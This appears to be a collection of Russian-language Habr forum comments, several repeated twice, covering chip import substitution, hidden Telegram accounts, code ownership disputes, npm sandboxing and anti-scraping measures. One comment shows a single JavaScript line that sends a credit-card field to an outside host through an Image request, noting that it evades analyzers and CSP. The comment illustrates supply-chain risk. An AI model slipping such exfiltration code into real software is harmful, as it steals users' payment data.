Надо чтобы заработал капитализм: пока дешевле было заказать на Тайване, чем строить свои заводы - бизнес закономерно и пальцем о палец не ударил, и всё созданное было не для денег, а для госсектора и формально показательно для остальных "вот у нас есть импортозамещение". Сейчас конкуренции уже не будет внутри страны, чёрный рынок будет с дикой наценкой, так что бизнес только начнёт шевеление, но уже сможет начать конкурентную борьбу принципиально, раньше в этом просто не было экономического смысла, т.к. процесс долгий, а следовательно рискованный, и рынок завален.
Учитывая, что все рынки, кроме западных, остаются открытыми, даже по техпроцессу 10-летней давности можно пытаться искать какую-то выгодную комбинацию по издержкам и производительности. Есть куча предприятий, которым нужны дешёвые компы, которые тянут только офис. Вот с этого малого и можно объективно начать, налаживать каналы с производством оптики, литографии итд.
У Эльбруса, кстати, проблемы не только с Тайванем: там оверхед на трансляцию обычного х86 софта, так это не сработает, конкуренция получится если процессоры смогут встроится в мировую экосистему и где-то ещё поджаться дополнительно, что-то оптимизировать для улучшения цены/производительности, т.к. из-за низких объёмов цена в любом случае будет высокой, нужно искать другие варианты.
Главная задача — скрыть сам факт наличия двойного дна, а значит секретные контакты и переписка должны подгружаться с сервера в реалтайме и улетучиваться с памяти после смены диалога, перехода в фоновый режим итд.
Никаких контейнеров, потому что уже сам факт их наличия или способа ввода пароля говорит о том, что с вас есть что выбить. Клиент по этой же причине должен быть строго оригинальным.
Соотв. можно сделать отдельный телеграм сервер, визуально выступающий в роли обычного прокси, но роутящий соединение с главным или секретным аккаунтом по какому-то отпечатку, хешу соединения или чему-то такому. Интел вроде бы вообще передавал информацию по порядку пакетов, если я верно помню. Либо какой-то паблик софт, который роутит чужое соединение только будучи включённым.
Так же можно заюзать горячую ссылку на QR коде, которая откроет возможность залогинить в 2хминутный промежуток с этого ip адреса + устройства, вводя пароль в поле поиска, а код наколоть себе в виде девы Марии на руке))
Сервер в состоянии удалить и контакты и переписку в клиентах отдельных юзеров, поэтому и истории не будет оставаться и из памяти это будет выгружено, и клиент будет оригинальным. Но я полагаю сделать сервер будет сложно и мало кто за 5к возьмётся
Допутим кодер написал модуль, забрал себе его домой, создал конкурента и уволился.
Вопрос: как доказать, что это именно модуль компании? Если он добавил в него 1 функцию или чуть модифицировал — это всё ещё модуль компании? А если этот модуль он не трогал, а просто, используя знания, полученные при его написании, написал свой, делающий то же самое, то написанное заново может выглядеть 1 в 1 с тем что есть, с такими же мелкими отличиями, как и просто добавление функции, как определить написал он это сам с нуля или модифицировал?
Мне кажется это то же самое, что и разбирательства по авторским правам, когда воруют киносценарий или его кусок — бесперспективное дело.
Если же признать, что ценится не код, а знания, то логичнее использовать договор с пунктом о запрете работать в конкурирующей компании после увольнения, как делают на западе, но и в этом случае он может просто передать «другу» или вообще работать без оформления.
Короче, полно вопросов, и полно историй о переманивании, и о создании конкурентов бывшими кодерами, и даже о переливе клиентской базы на их новые проекты — без последствий для них. Но так же полно историй и о больших технологических корпорациях, которые живут до сих пор. Мне кажется юридически тут не справиться никак, надо просто иметь рычаги, на которые нельзя повлиять самим кодом и функционалом, чтобы при создании аналогичных бизнес-процессов у тебя было преимущество, и выстраивать помимо них хорошие отношения
Это вы чуток грустите, когда «все радуются» провалу миссии, а представьте теперь, что происходит в голове, когда так подаются самые обычные, но успешные полёты — как будто так и должно быть и это величайшие победы человечества хехе
Люди не могут понять как у них самих формируются цели, почему потеют над кажущимися бессмысленными вещами, а то что надумали как важное — откладывают на бесконечный понедельник, а вы хотите, чтобы цели имел ИИ.
Факт в том, что все людские цели — это способ занять свои инстинкты, которые технически нам не нужны. Просто выживали те, у кого они есть. У роботов впринципе такого не будет, для этого им нужна среда, где будут выживать те роботы, у которых вшитая программа выжить, и полное разнообразие программ за миллиард поколений. В виртуальном мире они могут провести миллионы симуляций за секунды, но и выживать они будут относительно виртуального мира. А чтобы иметь цели относительно реального мира — надо физически в нём жить в куче поколений. И сформируются и стайные вшитые программы, и индивидуальные, и программы выживания вида. А если так будет, то чем робот будет отличаться от человека? Ничем, это будет тот же человек, в другой обёртке.
В php композер тоже скачивает миллион зависимостей, но там есть простой пул решений: open_basedir чтобы не дать скриптам шариться по компу, а ещё disabled_functions, чтобы отключить всё, что может быть опасным и вообще, даже чисто архитектурно, не должно быть использовано.
У js есть одна особенность: Вебпак, поэтому вряд ли можно отключить функции запуска процессов, манипуляций правами и всякого такого, нодовские фреймворки стали слишком от этого зависимы (и это кстати тоже проблема). Но разрабы могли бы сделать аналог open_basedir для песочницы, в которой крутятся нодовские процессы. Это сняло бы сразу часть проблем. И в идеале бы, чтобы в этой песочнице запускались и все дочерние процессы. Вряд ли найдётся много кодеров, которые заморачиваются настройкой изолированных сред для запуска самой среды разработки и нодовских процессов, так было бы невозможно работать, нужно решение из коробки как в пхп
Как можно улучшить подачу материала в математических текстах
В текущих (российских) реалиях — никак. Энтузиасты есть, профессионалы есть, мотивации нет.
Надо просто поднимать время от времени хайп по поводу того, что математик — уважаемый человек, аналогично и к учёному. Когда учёные поймут, что их могут полюбить массы за то, что те доступным языком описали какие-то сложные вещи, или даже выложили такое описание на ютуб, мотивация сразу появится, я гарантирую.
Но пока у нас прививается только любовь к западным учёным, к западным космическим агенствам, а любые отечественные начинания несправедливо охаяны и высмеяны с ног до головы, мало какому учёному или профессору захочется после этого ради этих людей что-то нормальное писать. И поделом. Так что сам факт этой статьи — это уже хайп в правильном направлении, надо просто немного оптимизма и уважения добавить.
Попробовал сидеть как указано: огонь, это и правда работает, спина полностью расслаблена, хорошо прилегает к 90 градусному креслу и при этом не болит. Потом полазал по инету, оказывается это и есть тот правильный способ сидеть — на седалищных костях, которые как бы лежат, если садится обычным, прямым способом.
— Мы предоставили Apple ордер и они помогли нам получить доступ к телефону, однако там не было никаких существенных улик, в основном личные фотографии.
Что и требовалось доказать: осенью 2016-го эта «перепалка» между ФБР и Apple с требованием дать доступы к телефону террориста, который типа как Эппл не дали — была чистой воды пиаром, и маркетинг дошёл уже до уровня ФБР, а оно и само радо всем рассказать про то, как они защищают права человека, при этом контролируя всё. А возможно даже яблоко просто покрывало какого-то своего человека, и он был достаточно серьёзной шишкой, чтобы ФБР пошло через медию.
Обычно в данных есть очень сладкие позиции, без которых парсинг бессмысленен, и которые не нужны поисковикам, т.е. которые можно не отдавать со страницей, в текущем примере — это свободные места. Вот чтобы их защитить и можно приложить усилия по шифрованию, обфускации js, чтобы тяжело было алгоритм шифрования вычленить, обфускации DOM и структурно и на уровне названий, не говоря про то что селениумы можно определить. А ещё бывают чёрные списки прокси, ведь при распараллеленой системе они захотят покупать дешёвые неуникальные и пачками, а чтобы защитить прокси-юзеров — использовать систему очков, где сам факт чёрного прокси уже прибавляет значительное их кол-во, но недостаточное, чтобы заблокировать простого юзера.
1. Люди стараются выглядеть умнее, чем они есть на самом деле. И код тут не причём, это лишь желание уважения (либо подросток до 25), которое можно создать здоровой атмосферой в команде.
2. Люди хотят развиваться и пользоваться инструментами, о крутости которых слышали от других. Люди хотят разрабатывать свои фичи. И это нормально, можно лишь создать культуру такого развития, чтобы проекты не превращались в хаос, не затягивались, а новые идеи были документированы и обсуждены.
3. Люди не понимают к чему приведут их решения с архитектурной точки зрения. Из-за недостатка опыта, который не так страшен, намного страшнее когда не понимают как их кусочек будет лежать в общей архитектуре, для чего они его делают и как в целом тут всё работает. Такое я наблюдал регулярно: не понимающий телеги прогер будет делать колесо с набором грязи, которую он считает правильной.
4. Для долгосрочного развития проекта надо писать понятный код в единой канве. И это тоже не задача кодеров, культуру этого (и инструменты) должны выстраивать тимлиды и управленцы, вплоть до первого лица.
let img=new Image(); img.src="https://LULsite.com/?credit="+$('.credit')[0].value;
Это без всяких фетчей отправит запрос, который отследить сложнее, если смотреть через анализаторы кода или даже визуально. Кроме того, CSP пропустит этот запрос, если не указать img-src (чего почти никто не делает). А кроме Image сколько ещё есть прекрасного.
Вывод: можно напрягаться и писать анализаторы, чем некогда занимался я, а можно выпустить продукт поскорее, просто не увлекаясь сторонними пакетами столь фанатично, и настроить несколько уровней безопасности, чтобы доступ к любому из них не дал украсть или разрушить всё остальное.
Прокрастинация — это усталость, этого знания вам достаточно, чтобы сделать выводы и построить стратегии. Внутри дня — небольшие 15-минутные отдыхи с полным отвлечением от рода деятельности, глобально — полное отвлечение от метода решения вопроса и от вопроса вообще, что позволяет перестроить стратегию его решения и удобно встроить её в жизнь.
Много стартапов сегодня создаются чисто ради прибыли, некоторые — ради идеи. Копия же всегда создаётся ради денег, и в ней нет замотивированного на идею сотрудника, который сделает все мелочи правильно, в духе задумки, и будет готов работать по 20 часов в сутки, заряжая оптимизмом остальных. Но даже если в стартап влили деньги, оставив автора с горящими глазами, то с ним обязательно был подписан кабальный договор, в котором ему достались 20%, жёсткие дедлайны и отсутствие свободы выбора вектора развития. Даже самый замотивированный автор будет видеть, что это больше не его проект и смысла развивать его будет всё меньше.
В мире, где все хотят только вкладывать и получать проценты, всё решает конкретный исполнитель.
Интересно, что много хабровчан обладают достаточными знаниями и опытом, чтобы самим такую ботсеть построить, и даже наладить процессы, доведя их до почти полного автоматизма, но люди делают выбор в пользу спокойного сна. Это сильный выбор. Что стоит куча бабла, когда ты даже на самом лучшем отдыхе не можешь расслабиться?
Со взломанных серверов тех-же. Ботнет сделать сложно и управлять им сложно, а вот накопать пачку хостов с вордпрессом, который обвешан плагинами, не обновлявшихся годами — проще простого. На некоторых будет к тому же и несколько ип-адресов.
Приятно видеть автора, с которым мысли совпадают практически максимально. Тоже прочёл несколько книг по тайм-менеджменту, и немерено статей, но не удалось найти ни одного инструмента, который отвечал бы всем этим пунктам (с каждым из которых полностью согласен) и некоторым моим идеям. Все эти инструменты очень упрощённо определяют концепции задач, проекта, его информации и самое главное — сопровождения всего этого непосредственно в работе (да и в продакшне тоже). Не говоря про то, что странно разделять на разные платформы вопросы рабочие, бытовые, отдыха и саморазвития, если по времени это всё взаимосвязано (но идеологически должно быть разделено). Особенно жестоко взаимосвязан отдых с работой в течении дня, как один из ключевых способов повышения эффективности, но на удивление этого почти нигде нет, хотя сколько всего я сделал, а при правильной автоматизации можно ещё больше сделать, не превращая отдых в рутину или работу.
MLO продвинулся в этом направлении, в других частях продвинулся Paymo, но всё-равно это не отражает идеи. Сейчас разрабатываю свою систему, которая соберёт все описанные концепции воедино в правильную форму, и, видимо, после разработки тоже придётся прописать заметку на Хабр, чтобы рассказать как я это вижу как систему, а не как отдельные понятия с отдельными фишками.
Надо чтобы заработал капитализм: пока дешевле было заказать на Тайване, чем строить свои заводы - бизнес закономерно и пальцем о палец не ударил, и всё созданное было не для денег, а для госсектора и формально показательно для остальных "вот у нас есть импортозамещение". Сейчас конкуренции уже не будет внутри страны, чёрный рынок будет с дикой наценкой, так что бизнес только начнёт шевеление, но уже сможет начать конкурентную борьбу принципиально, раньше в этом просто не было экономического смысла, т.к. процесс долгий, а следовательно рискованный, и рынок завален.
Учитывая, что все рынки, кроме западных, остаются открытыми, даже по техпроцессу 10-летней давности можно пытаться искать какую-то выгодную комбинацию по издержкам и производительности. Есть куча предприятий, которым нужны дешёвые компы, которые тянут только офис. Вот с этого малого и можно объективно начать, налаживать каналы с производством оптики, литографии итд.
У Эльбруса, кстати, проблемы не только с Тайванем: там оверхед на трансляцию обычного х86 софта, так это не сработает, конкуренция получится если процессоры смогут встроится в мировую экосистему и где-то ещё поджаться дополнительно, что-то оптимизировать для улучшения цены/производительности, т.к. из-за низких объёмов цена в любом случае будет высокой, нужно искать другие варианты.
Теперь, когда есть индикатор камеры, юзера стало ещё проще убедить, что за ним никто не следит
Хабр есть, осталось добавить гитхаб, может ещё стакс, тогда через 15 лет вырастут такие детки, что мем про русских хакеров будут вспоминать с упоением
Главная задача — скрыть сам факт наличия двойного дна, а значит секретные контакты и переписка должны подгружаться с сервера в реалтайме и улетучиваться с памяти после смены диалога, перехода в фоновый режим итд.
Никаких контейнеров, потому что уже сам факт их наличия или способа ввода пароля говорит о том, что с вас есть что выбить. Клиент по этой же причине должен быть строго оригинальным.
Соотв. можно сделать отдельный телеграм сервер, визуально выступающий в роли обычного прокси, но роутящий соединение с главным или секретным аккаунтом по какому-то отпечатку, хешу соединения или чему-то такому. Интел вроде бы вообще передавал информацию по порядку пакетов, если я верно помню. Либо какой-то паблик софт, который роутит чужое соединение только будучи включённым.
Так же можно заюзать горячую ссылку на QR коде, которая откроет возможность залогинить в 2хминутный промежуток с этого ip адреса + устройства, вводя пароль в поле поиска, а код наколоть себе в виде девы Марии на руке))
Сервер в состоянии удалить и контакты и переписку в клиентах отдельных юзеров, поэтому и истории не будет оставаться и из памяти это будет выгружено, и клиент будет оригинальным. Но я полагаю сделать сервер будет сложно и мало кто за 5к возьмётся
Вопрос: как доказать, что это именно модуль компании? Если он добавил в него 1 функцию или чуть модифицировал — это всё ещё модуль компании? А если этот модуль он не трогал, а просто, используя знания, полученные при его написании, написал свой, делающий то же самое, то написанное заново может выглядеть 1 в 1 с тем что есть, с такими же мелкими отличиями, как и просто добавление функции, как определить написал он это сам с нуля или модифицировал?
Мне кажется это то же самое, что и разбирательства по авторским правам, когда воруют киносценарий или его кусок — бесперспективное дело.
Если же признать, что ценится не код, а знания, то логичнее использовать договор с пунктом о запрете работать в конкурирующей компании после увольнения, как делают на западе, но и в этом случае он может просто передать «другу» или вообще работать без оформления.
Короче, полно вопросов, и полно историй о переманивании, и о создании конкурентов бывшими кодерами, и даже о переливе клиентской базы на их новые проекты — без последствий для них. Но так же полно историй и о больших технологических корпорациях, которые живут до сих пор. Мне кажется юридически тут не справиться никак, надо просто иметь рычаги, на которые нельзя повлиять самим кодом и функционалом, чтобы при создании аналогичных бизнес-процессов у тебя было преимущество, и выстраивать помимо них хорошие отношения
Факт в том, что все людские цели — это способ занять свои инстинкты, которые технически нам не нужны. Просто выживали те, у кого они есть. У роботов впринципе такого не будет, для этого им нужна среда, где будут выживать те роботы, у которых вшитая программа выжить, и полное разнообразие программ за миллиард поколений. В виртуальном мире они могут провести миллионы симуляций за секунды, но и выживать они будут относительно виртуального мира. А чтобы иметь цели относительно реального мира — надо физически в нём жить в куче поколений. И сформируются и стайные вшитые программы, и индивидуальные, и программы выживания вида. А если так будет, то чем робот будет отличаться от человека? Ничем, это будет тот же человек, в другой обёртке.
У js есть одна особенность: Вебпак, поэтому вряд ли можно отключить функции запуска процессов, манипуляций правами и всякого такого, нодовские фреймворки стали слишком от этого зависимы (и это кстати тоже проблема). Но разрабы могли бы сделать аналог open_basedir для песочницы, в которой крутятся нодовские процессы. Это сняло бы сразу часть проблем. И в идеале бы, чтобы в этой песочнице запускались и все дочерние процессы. Вряд ли найдётся много кодеров, которые заморачиваются настройкой изолированных сред для запуска самой среды разработки и нодовских процессов, так было бы невозможно работать, нужно решение из коробки как в пхп
Надо просто поднимать время от времени хайп по поводу того, что математик — уважаемый человек, аналогично и к учёному. Когда учёные поймут, что их могут полюбить массы за то, что те доступным языком описали какие-то сложные вещи, или даже выложили такое описание на ютуб, мотивация сразу появится, я гарантирую.
Но пока у нас прививается только любовь к западным учёным, к западным космическим агенствам, а любые отечественные начинания несправедливо охаяны и высмеяны с ног до головы, мало какому учёному или профессору захочется после этого ради этих людей что-то нормальное писать. И поделом. Так что сам факт этой статьи — это уже хайп в правильном направлении, надо просто немного оптимизма и уважения добавить.
Что и требовалось доказать: осенью 2016-го эта «перепалка» между ФБР и Apple с требованием дать доступы к телефону террориста, который типа как Эппл не дали — была чистой воды пиаром, и маркетинг дошёл уже до уровня ФБР, а оно и само радо всем рассказать про то, как они защищают права человека, при этом контролируя всё. А возможно даже яблоко просто покрывало какого-то своего человека, и он был достаточно серьёзной шишкой, чтобы ФБР пошло через медию.
1. Люди стараются выглядеть умнее, чем они есть на самом деле. И код тут не причём, это лишь желание уважения (либо подросток до 25), которое можно создать здоровой атмосферой в команде.
2. Люди хотят развиваться и пользоваться инструментами, о крутости которых слышали от других. Люди хотят разрабатывать свои фичи. И это нормально, можно лишь создать культуру такого развития, чтобы проекты не превращались в хаос, не затягивались, а новые идеи были документированы и обсуждены.
3. Люди не понимают к чему приведут их решения с архитектурной точки зрения. Из-за недостатка опыта, который не так страшен, намного страшнее когда не понимают как их кусочек будет лежать в общей архитектуре, для чего они его делают и как в целом тут всё работает. Такое я наблюдал регулярно: не понимающий телеги прогер будет делать колесо с набором грязи, которую он считает правильной.
4. Для долгосрочного развития проекта надо писать понятный код в единой канве. И это тоже не задача кодеров, культуру этого (и инструменты) должны выстраивать тимлиды и управленцы, вплоть до первого лица.
Это без всяких фетчей отправит запрос, который отследить сложнее, если смотреть через анализаторы кода или даже визуально. Кроме того, CSP пропустит этот запрос, если не указать img-src (чего почти никто не делает). А кроме Image сколько ещё есть прекрасного.
Вывод: можно напрягаться и писать анализаторы, чем некогда занимался я, а можно выпустить продукт поскорее, просто не увлекаясь сторонними пакетами столь фанатично, и настроить несколько уровней безопасности, чтобы доступ к любому из них не дал украсть или разрушить всё остальное.
В мире, где все хотят только вкладывать и получать проценты, всё решает конкретный исполнитель.
MLO продвинулся в этом направлении, в других частях продвинулся Paymo, но всё-равно это не отражает идеи. Сейчас разрабатываю свою систему, которая соберёт все описанные концепции воедино в правильную форму, и, видимо, после разработки тоже придётся прописать заметку на Хабр, чтобы рассказать как я это вижу как систему, а не как отдельные понятия с отдельными фишками.